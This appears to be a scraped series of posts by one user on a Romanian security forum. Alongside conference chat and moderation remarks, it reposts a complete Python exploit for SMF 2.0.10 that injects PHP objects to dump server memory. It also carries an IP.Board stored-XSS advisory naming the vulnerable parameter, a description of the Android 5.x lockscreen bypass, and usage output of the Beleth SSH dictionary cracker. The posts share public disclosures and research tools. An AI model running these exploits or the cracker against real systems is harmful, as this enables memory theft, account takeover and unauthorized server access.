Nytro

Cine face cate un topic pentru fiecare (care nu exista deja)?

Le-am cautat si eu pe cele de la Defcon, dar nu le-am gasit. Recomand tuturor: "When IoT Attacks: Hacking A Linux-Powered Rifle"! E fun. Vrei root pe o arma? Vezi video.

Am vazut aseara doua dintre ele: 1. Red Team vs Blue Team - Trebuie vazut! 2. Bypass Control Flow Guard - Continut bun, prezentare de cacat. Engleza chinezului ala e mai prosta chiar si decat a mea.

Cum de au aparut asa repede? Sa le descarc, pana nu le sterg (nefiind uploadate de catre staff)?

[h=1]SMF (Simple Machine Forum) <= 2.0.10 - Remote Memory Exfiltration Exploit[/h] #!/usr/bin/python# -*- coding: iso-8859-15 -*- ############################################################################# # Title: SMF (Simple Machine Forum) <= 2.0.10 Remote Memory Exfiltration Exploit # Authors: Andrea Palazzo # <andrea [dot] palazzo [at] truel [dot] it> # Filippo Roncari # <filippo [dot] roncari [at] truel [dot] it> # Truel Lab ~ http://lab.truel.it # Requirements: SMF <= 2.0.10 # PHP <= 5.6.11 / 5.5.27 / 5.4.43 # Advisories: TL-2015-PHP04 http://lab.truel.it/d/advisories/TL-2015-PHP04.txt # TL-2015-PHP06 http://lab.truel.it/d/advisories/TL-2015-PHP06.txt # TL-2015-SMF01 n/y/a # Details: http://lab.truel.it/2015/09/php-object-injection-the-dirty-way/ # Demo: https://www.youtube.com/watch?v=dNRXTt7XQxs ############################################################################ import sys, requests, time, os, socket, thread, base64, string, urllib from multiprocessing import Process #Payload Config bytes_num = 000 #num of bytes to dump address = 000 #starting memory address #Target Config cookie = {'PHPSESSID' : '000'} #SMF session cookie target_host = 'http://localhost/smf/index.php' #URL of target installation index.php csrftoken = '' #Local Server Config host = "localhost" port = 31337 #Memory dump variables dumped = '' current_dump = '' in_string = False brute_index = 0 brute_list = list(string.ascii_letters + string.digits) r_ok = 'HTTP/1.0 200 OK' + '\n' r_re = 'HTTP/1.0 302 OK' + '\n' r_body = '''Server: Truel-Server Content-Type: text/xml Connection: keep-alive Content-Length: 395 <env:Envelope xmlns:env="http://www.w3.org/2003/05/soap-envelope"> <env:Header> <n:alertcontrol xmlns:n="http://example.org/alertcontrol"> <n:priority>1</n:priority> <n:expires>2001-06-22T14:00:00-05:00</n:expires> </n:alertcontrol> </env:Header> <env:Body> <m:alert xmlns:m="http://example.org/alert"> <m:msg>Truel</m:msg> </m:alert> </env:Body> </env:Envelope>''' def serverStart(): print "[+] Setting up local server on port " + str(port) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) if not sock: print "[X] Fatal Error: Unable to create socket" sock.bind((host, port)) sock.listen(1) return sock def getToken(): global csrftoken print "[+] Trying to get a valid CSRF token" for n in range(3): #3 attempts r = requests.get(target_host, cookies=cookie, allow_redirects=False) r = r.text if(r.find("action=logout;")!=-1): break start = r.find("action=logout;") if (start !=-1): end = (r[start+14:]).find('">') csrftoken = r[start+14 : start+end+14] print "[+] Authentication done. Got token " + str(csrftoken) return True else: print "[X] Fatal Error: You are not authenticated. Check the provided PHPSESSID." return False def prepareForExploit(): if not(getToken()): #get CSRF token os._exit(1) target = target_host + '?action=suggest&' + csrftoken + '&search_param=test' r = requests.get(target, cookies=cookie, allow_redirects=False) #necessary request return def forgePayload(current_try, address): location = "http://" + current_try payload = 'O:12:"DateInterval":1:{s:14:"special_amount";O:9:"Exception":1:{s:19:"\x00Exception\x00previous";O:10:"SoapClient":5:{s:3:"uri";s:1:"a";s:8:"location";s:' + str(len(location)) + ':"' + location + '";s:8:"_cookies";a:1:{s:5:"owned";a:3:{i:0;s:1:"a";i:2;i:' + str(address) + ';i:1;i:' + str(address) + ';}}s:11:"_proxy_host";s:' + str(len(host)) + ':"' + str(host) + '";s:11:"_proxy_port";i:' + str(port) + ';}}}' return payload def sendPayload(payload,null): target = target_host + '?action=suggest&' + csrftoken + '&search_param=' + (base64.b64encode(payload)) #where injection happens try: r = requests.get(target, cookies=cookie, allow_redirects=False) except requests.exceptions.RequestException: print "[X] Fatal Error: Unable to reach the remote host (Connection Refuse)" os._exit(1) return def limitReached(dumped): if(len(dumped) >= bytes_num): return True else: return False def printDumped(dumped): d = " " cnt = 1 print "[+] " + str(len(dumped)) + " bytes dumped from " + target_host print "[+] ======================= Dumped Data =======================" for i in range(bytes_num): d = d + str(dumped[i]) if (cnt % 48 == 0): print d d = " " if (cnt == bytes_num): print d cnt = cnt + 1 def getSoapRequest(sock): connection, sender = sock.accept() request = connection.recv(8192) return (connection, request) def sendSoapResponse(connection, content): connection.send(content) connection.close() return def getDumpedFromHost(request): i = request.find("Host: ") + 6 v = request[i:i+1] return v def pushDumped(value, string): global dumped global current_dump global brute_index global address global in_string dumped = str(value) + str(dumped) if(string): current_dump = str(value) + str(current_dump) else: current_dump = "" in_string = string address = address-1 brute_index = 0 print "[" + hex(address) + "] " + str(value) return def bruteViaResponse(sock): global brute_index current_try = "" response_ok = r_ok + r_body for n in range(19): connection, request = getSoapRequest(sock) if not request: connection.close() return False if request.find("owned")!=-1: pushDumped(getDumpedFromHost(request), True) sendSoapResponse(connection,response_ok) return True else: if((brute_index+1) == len(brute_list)): sendSoapResponse(connection,response_ok) return False brute_index = brute_index + 1 if not in_string: current_try = brute_list[brute_index] else: current_try = brute_list[brute_index] + str(current_dump) response_re = r_re + 'Location: http://' + str(current_try) + '\n' + r_body sendSoapResponse(connection,response_re) connection, request = getSoapRequest(sock) if request.find("owned")!=-1: pushDumped(getDumpedFromHost(request), True) sendSoapResponse(connection,response_ok) return True sendSoapResponse(connection,response_ok) return False def bruteViaRequest(sock): global brute_index brute_index = 0 current_try = "" while(True): if(brute_index == len(brute_list)): pushDumped(".", False) if limitReached(dumped): printDumped(dumped) return if not in_string: current_try = brute_list[brute_index] else: current_try = brute_list[brute_index] + str(current_dump) payload = forgePayload(current_try,address) thread.start_new_thread(sendPayload,(payload,"")) if not bruteViaResponse(sock): brute_index = brute_index + 1 return def runExploit(): print "[+] Starting exploit" sock = serverStart() prepareForExploit() print "[+] Trying to dump " + str(bytes_num) + " bytes from " + str(target_host) bruteViaRequest(sock) sock.close() print "[+] Bye ~ Truel Lab (http://lab.truel.it)" sys.exit(0) runExploit() Sursa: https://www.exploit-db.com/exploits/38304/

LinkOfDeath.com - when it will catch you it will kill you('r tab)

Lu ala cu vn5socks m-am plictisit de cate ori i-am dat ban si l-am lasat sa faca spam intr-un topic Edit: Le-am dat ban, dar parca vad peste 2-3 ore din nou posturi . Eh, cel putin ajuta la SEO. Cred.

BitDefender Internet Security 2016 – 6 luni licenta GRATUITA! By Radu FaraVirusi(com) on September 21, 2015 BitDefender a lansat gamei de produse BitDefender 2016, ce aduce cateva modificari notabile. Acum puteti avea licenta GRATUITA timp de 6 luni de zile pentru produsul BitDefender Internet Security 2016. A fost adaugata protectie impotriva programelor malitioase de tip ransomware (care blocheaza PC-ul si cer o rascumparare in bani pentru deblocare) – asigura un scut impotriva accesului aplicatiilor necunoscute la documentele personale. Motorul BitDefender a fost imbunatatit cu o tehnologie denumita “machine learning-based technologies”, permitandu-i sa detecteze amenintari noi mai repede ca niciodata. Firewall-ul a fost rescris si are o performanta imbunatatita. Au fost aduse modificari si modulelor password manager, control parental, criptarea fisierelor si utilitarelor anti furt. Pentru a obtine licenta GRATUITA accesati site-ul: Get 6 Months Free Of Bitdefender! The Best Protection Against Cyber-Threats. Sursa: BitDefender Internet Security 2016 – 6 luni licenta GRATUITA!

Sa ne spui si noua daca afli mai multe despre evenimentul de la CERT. O sa fie tehnic? Eu cred ca o sa fie de "informare generala". Cel de la Provision se poate descrie intr-un singur cuvant: SALES. Owasp o sa fie interesant.

Da, nu se merita. Nu e pentru noi.

9:2 A Sermon on Newton and Turing 9:3 Globalstar Satellite Communications 9:4 Keenly Spraying the Kernel Pools 9:5 The Second Underhanded Crypto Contest 9:6 Cross VM Communications 9:7 Antivirus Tumors 9:8 A Recipe for TCP/IPA 9:9 Mischief with AX.25 and APRS 9:10 Napravi i ti Ra?cunar „Galaksija“ 9:11 Root Rights are a Grrl’s Best Friend! 9:12 What If You Could Listen to This PDF? 9:13 Oona’s Puzzle Corner! Link: https://www.alchemistowl.org/pocorgtfo/pocorgtfo09.pdf

Android 5.x Lockscreen Bypass (CVE-2015-3860) Posted on September 15, 2015 by jgor A vulnerability exists in Android 5.x <= 5.1.1 (before build LMY48M) that allows an attacker to crash the lockscreen and gain full access to a locked device, even if encryption is enabled on the device. By manipulating a sufficiently large string in the password field when the camera app is active an attacker is able to destabilize the lockscreen, causing it to crash to the home screen. At this point arbitrary applications can be run or adb developer access can be enabled to gain full access to the device and expose any data contained therein. September 2015: Elevation of Privilege Vulnerability in Lockscreen (CVE-2015-3860) The attack requires the following criteria: Attacker must have physical access to the device User must have a password set (pattern / pin configurations do not appear to be exploitable) Proof-of-concept – Nexus 4 factory image 5.1.1 (build LMY48I): Sursa: Android 5.x Lockscreen Bypass (CVE-2015-3860) | UT Austin Information Security Office

Ce va mai place sa comentati aiurea... Daca nu va intereseaza, nu postati. Ramaneti la McDonalds.

Da, e smechera dracia aia, web shell rapid

You are za best! Thanks!

Nu stiu daca s-a mai postat: Criza refugia?ilor e de fapt o invazie musulman? organizat? | NapocaNews

O sa fie si un workshop de web security: https://www.owasp.org/index.php/OWASP_EEE_Bucharest_Event_2015#tab=Agenda Daca sunteti interesati, sau aveti prieteni care lucreaza pe web, vi-l recomand.

Asta as vrea si eu sa inteleg. Ce as putea face cu un astfel de cont?

My first Defcon experience Defcon is a meta-conference which anyone passionate by IT security should attend. It is more than a conference, it is the heaven of hackers and security professionals, a place where definitely you will find something both cool and useful, even if you are interested in web security, reverse engineering, social engineering, hardware, lock-picking, Internet of Things or car-hacking topics. Articol: My first Defcon experience – Security Café Cate poze si pareri despre conferinta. Din pacate, nu am apucat sa vad tot ce era acolo. Sper sa ajung si la anul.

Lame.

Daca e adevarat, e doar un motiv in plus sa il folosesc. Oricum, din declaratiile lor, am inteles ca diverse firme de AV le foloseau semnaturile. Le furau. Deci mi s-ar parea o razbunare geniala.

[h=1]IP.Board 4.X - Stored XSS[/h] # Exploit Title: IP.Board 4.X Stored XSS # Date: 27-08-2015 # Software Link: https://www.invisionpower.com/ # Exploit Author: snop. # Contact: http://twitter.com/rabbitz_org # Website: http://rabbitz.org # Category: webapps 1. Description A registered or non-registered user can create a calendar event including malicious JavaScript code who will be permanently stored in the pages source. 2. Proof of Concept http://URL_TO_FORUM/calendar/submit/?calendar=1 POST: Affected Paramter: event_location[address][] 3. Solution Update to version 4.0.12.1 https://community.invisionpower.com/release-notes/40121-r22/ Disclosure Timeline 27.07.15: Vendor notified 05.08.15: Fix released 27.08.15: Public disclosure Sursa: https://www.exploit-db.com/exploits/37989/

bot/gate.php Doesn't look like "educational purposes".

Beleth - Dictionary based SSH cracker Usage: ./beleth [OPTIONS] -c [payload] Execute payload on remote server once logged in -h Display this help -l [threads] Limit threads to given number. Default: 4 -p [port] Specify remote port -P [password] Use single password attempt -t [target] Attempt connections to this server -u [user] Attempt connection using this username -v -v (Show attempts) -vv (Show debugging) -w [wordlist] Use this wordlist. Defaults to wordlist.txt Example: $ ./beleth -l 15 -t 127.0.0.1 -u stderr -w wordlist.txt ?????????????????????????????????????????? ? Beleth ? ? www.chokepoint.net ? ?????????????????????????????????????????? [*] Read 25 passwords from file. [*] Starting task manager [*] Spawning 15 threads [*] Starting attack on root@127.0.0.1:22 [*] Authentication succeeded (root:jesus@127.0.0.1:22) [*] Executing: uname -a [*] Linux eclipse 3.2.0-4-686-pae #1 SMP Debian 3.2.46-1+deb7u1 i686 GNU/Linux [*] Cleaning up child processes. Sursa: https://github.com/chokepoint/Beleth